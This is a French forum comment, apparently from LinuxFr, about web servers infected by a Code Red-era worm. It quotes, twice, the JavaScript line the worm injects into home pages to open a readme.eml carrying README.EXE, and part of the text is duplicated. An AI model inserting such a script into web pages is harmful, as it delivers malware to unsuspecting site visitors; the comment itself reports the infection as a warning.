Si vous avez essayé de contacter (par telnet ip 80 c'est plus prudent si vous êtes sous Windows) comme moi les serveurs qui envoient ces $¤#"% requêtes, une ligne
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
est insérée à la fin de la page de garde, et un fichier readme.eml est ajouté à la racine. Ce qui vous ouvre une belle fenêtre avec un README.EXE en attachement. De là à cliquer, il n'y a qu'un neuneu^H^H^H^H^H^Hpas.
# Sites WEB infectés
Posté par Philippe Martin . En réponse à la dépêche Nouveau Vers: Code Red le retour. Évalué à 3.
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
est insérée à la fin de la page de garde, et un fichier readme.eml est ajouté à la racine. Ce qui vous ouvre une belle fenêtre avec un README.EXE en attachement. De là à cliquer, il n'y a qu'un neuneu^H^H^H^H^H^Hpas.
-
Feloy - Ah zut, j'suis déjà identifié